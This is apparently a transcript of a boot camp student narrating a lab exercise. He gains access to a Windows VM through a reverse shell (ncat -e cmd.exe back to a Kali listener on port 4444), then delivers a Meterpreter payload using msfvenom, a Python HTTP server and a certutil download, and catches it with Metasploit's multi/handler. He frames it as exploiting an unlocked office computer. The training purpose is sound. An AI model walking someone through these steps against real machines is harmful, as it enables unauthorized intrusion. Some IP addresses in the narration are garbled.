Alright, I think I did a thing. In my boot camp, we've been having trouble accessing this Windows virtual machine. For some reason, it's blocking inbound connection requests, even though it does still allow outbound traffic. And what we've been trying to do is get into the Windows system to mess with SMB via the Kali attacker machine. For some reason, again, we've been blocked sending traffic requests outbound from the Kali machine, but inbound from the Windows machine, it seems like it's not an issue. So what I realized is that I could potentially use Nmap on the Windows machine to create an outbound Ncat connection request that would be caught by a listener on the Kali side. Once that's established, I would have command line access from the Kali machine into Windows to run PowerShell commands. So I got the Nmap program installed, which contains Ncat, onto Windows. So let's double check that. Command prompt, run as administrator. So this is assuming that we had some sort of access to a Windows machine. Let's say you're at work and somebody left their machine logged on as they went to the bathroom. When I was in finance, that was a big thing, that you had to lock your machine when you left your desk. This is probably why. So let's say we now have Ncat set up. Let's just double check it with a help command. So we've got Ncat here loading up after the installation. We've got the opportunity now to set up an outbound Ncat request. So first, what I want to do on the Kali side is set up a Ncat listener. So we'll do nc-lvp and then port 4444, our favorite test port for this situation. So now that's listening. On this side, let's go ahead and get ready to connect. Come on, buddy. Get ready to connect to our Kali machine. So I'm going to grab the IP address 172.314.8.145. So on this side, we're going to run an ncat command. We're going to specify this port. I'll double check this because I'm probably going to get it wrong. And then we're going to specify our Kali IP, the port that we're connecting to. And there's going to be a -e, I think, and a command.exe. Let's double check. So -e, cmd.exe, Ncat 172.314.8.145, port 4444. Bingo, bango. Wanna do a tango. Don't you dare do that to me. We are in it. Hacker hoodie up. So it knows I'm serious. Come on. Let's go. What is this? Slowing my roll here. Alright, we're listening. Yeah. Do we need this when we have this? Let's just do it. Alright, we're listening. We've got our command. It didn't go through. We press enter. We press it again. till it goes through. There we go. So boom, connection, Netcat connection. So now we've got a tunnel connecting the two systems. This next part I haven't tried yet. I got too excited. But we need to do a couple of things. We need to generate a payload on the Kali side. So let's hop into msfvenom, set up a payload. The Windows machines and x64 architecture. We're going to stick with Meterpreter, reverse TCP. Our Kali IP favorite port. We need to make an executable for Windows, and we'll call it mrtpayload.exe. Alright, so we are creating a payload with Windows x64 Meterpreter. It's a reverse TCP for a transfer control protocol payload. We've got our IP address and port. So now we'll hit enter here and let that download. In the meantime, we need to get a way set up to transfer this stuff. So now we're going to set up a server, an HTTP server, port 8080, Python 3, let's do that. So now we've got a server set up on the Kali side. We've got our payload generated. Looks to be a staged payload. Now we'll go to our command line here in Windows. And now let's try this out. Whoops. Doesn't like it. Let's see. Doesn't like that. Let's just try it out. This uses Windows command line tool. Alright. That's going to require PowerShell itself. I think since we are technically in command line, let's actually, how can I know if I'm in command line or PowerShell when in a reverse shell? Let's see. Windows System 32. So environment variables. This is the command prompt executable path, it looks like. If it were PowerShell, it would typically be in the users file, not Windows System 32. So let's assume it's command line based on that brief check. And let's do certutil URL cache f HTTP. Don't you do this to me now. We are in. Come on. All right. Is it working now? There we go. Okay, just decided to freeze up for a second. URL cache, beauty of AWS EC2. All right, URL cache, F, HTTP. We want our Cali IP address. For 145. I assume next is going to be the port 8080 that we put in. Now let's double check. We created the payload. It's in the current Cali directory. Let's double check that we started a server in the same directory. Cali, home directory, all in the home directory. So we should be good on creating the payload in the same directory as the HTTP server. And let's double check the name of the file, mrt payload exe. Oh shoot, I think I might have messed up one thing. Let's look at this again. I didn't put an output argument here, so let's try that again. So we've got format exe, output here, port, IP, and now we patiently wait. All right, that's better. Okay. So here it just outputted it to console since I didn't give it an output file to save to, but now we have the payload here. We've got our server still going. We are setting up a download now. And we are going to say mrt payload.exe, and we're going to send that to temp payload.exe, and let's give it a whirl. Command completed successfully, so that's a good sign. Let's check the temp file over here, just see if it's there. Can we find temp? This PC, C, temp. If it doesn't exist on this side, would it have sent it properly? Get request, okay, they're 200 statuses, so that's a good sign. It doesn't necessarily mean it sent the item through. So let's see, would it have automatically created the file on this side? I'm not sure, but let's do this to test it. This is again just saying, man, someone's on lunch, I guess, and they left their junk open. Now let's check this. All right, now we have a temp folder established. Let's try this one more time. Oh, you sucker. All right, let's type it out again. Actually, no, let's copy and paste, fam. Copy selection, paste clipboard, enter. Now, just check it here. Look at that. Wow. All right, so now we have a payload executed, or rather, we have a payload on the target computer. Now we need to set up a Meterpreter listener. So we don't technically need the HTTP server anymore, so we'll kill it for now. It has transferred what we needed. Do we still have our listener? No, we have our listener set up because we are connected here. Let's see, so we have our outbound connection. This should be where our listener is. Yep, okay, so the listener's connected still. Let's open up a new tab. Actually, we can use this one. Clear. So we've created a payload. Now we need to get set up on Metasploit console. We're going to use the classic exploit multi-handler. It's only classic because I've used it like twice. But for me now it's a veteran in the toolkit. Stick that on the resume. You got to round up 1 year's the most or least manageable increment of time on a resume. So if you outputted hello world on Python, 1 year Python experience, because you can't say 1 second Python experience, am I right? I just got rejected on a job for that. All right, exploit, multi, handler, check, clear. We're using the multi-handler. We are setting the payload to be the one that we generated. Reverse to CP, set lhost, one 172.3148145. Set L port fo. All right. I'm just thinking in my head now, am I performing redundant tasks here? I'm setting up Ncat. I moved a payload over with an HTTP server. Generating the payload was perhaps practice, but this payload could have been anything. So let's just keep moving on it and hit exploit. -J I still don't quite fully understand. Okay, the exploit. Reverse handler listener created. Now we can execute this payload. Oh, snaps. Okay, no, we did. So we downloaded it, the correct file, and I was nervous I downloaded something else or created a new file, but it looks like it just renamed it payload.exe. So we're in the correct directory. Payload.exe. Boom. So the listener caught the payload that I just set off. So now we have a session. Although that looks like, yeah, that's my Kali. So show sessions. Okay, sessions I1 dir. Okay. So now we're in with Meterpreter. Ultimately, something I wanted to do was get an SMB connection, just because that was one of their goals from like 3 classes ago that they couldn't get set up for us. So I want to do it. So I want to not do that. I want to find an SMB payload. So let's do msfvenom list payloads grep SMB and see what we get there. So we've successfully done a couple of things. We're pretending that someone in our, let's say, Merrill Lynch office left their Windows machine open. We had our little Kali laptop nearby, and we thought, this is an opportunity. So we walked over, we got Nmap on their Windows machine. We set up an outbound request with Ncat. We captured that outbound request with Ncat. We then created a payload for reverse TCP on msfvenom. We used Python 3 on Kali to create a web server. Through that web server, we used the certutil, was that what it was, command? Certutil URL cache, and then we downloaded the payload from Kali server to the temp folder that we created on the Windows side, payload.exe. We executed that payload.exe. We gained a Meterpreter shell from that. And now we are looking at other ways to connect. And I'm not seeing SMB, but maybe it's called server message block. Doesn't look like it creates SMBs. Speed reading when I should slowly read. Metasploit has exploits to target SMB. You can use SMB to deliver payloads generated, but I want to gain access to SMB. Let's see. If I ping now, since I have my Ncat connected, I'm thinking, can I ping the IP4 addresses with that port? So let's try. This is the last thing I'll mess around with, because now I'm just thinking out loud. 191.224, and I think we're going to try the public one. That makes more sense, but we are on the same network, so the private one might make sense too. being on the same network because in our pretend scenario, we are in the same building, taking advantage of a computer that was left unlocked. All right, let's try this now. Ping 35.90.191. I don't even know if you can ping to certain ports. No. That's also because I forgot a dot. Name or service unknown. Can you ping through a port? Let's just try pinging normally now. No. Ping. (172.31.61.207). No. Can I ping a port? Can I ping an IP with a port? I don't think so. Ping uses ICMP, which is its own port connection. We could use Ncat just to see if a port's open. ZV. Is it open only through that particular shell? I think so. Port 4444. Z option performs a port scan without sending any data. The V option is a verbose output. So Z is sneaky. It's from now on I'm calling it sneaky because it doesn't leave any data. It doesn't send any data, which means the Windows side wouldn't be able to log any data. Not seeing anything there though. We still have this. We were able to get payloads over. We've got our payload executed, creating a TCP connection here. TCP running through port 4444. Transmission control protocol means there was a handshake that occurred. HTTP via port 8080 was an HTTP request, and hypertext transfer protocol in terms of the protocol. Just thinking out loud. But I think we can call it a small victory here. This isn't going very quickly. That's okay. Let's call it there. If you have any corrections, suggestions, ideas on how to expand this a little bit, let me know. It is nice to have successfully gained access to this computer, this Microsoft machine that otherwise was inaccessible due to some technical error on the bootcamp side. So I will call that a victory and end it there. Learn good. Use these tools responsibly. We're here for good, not bad. And do your best.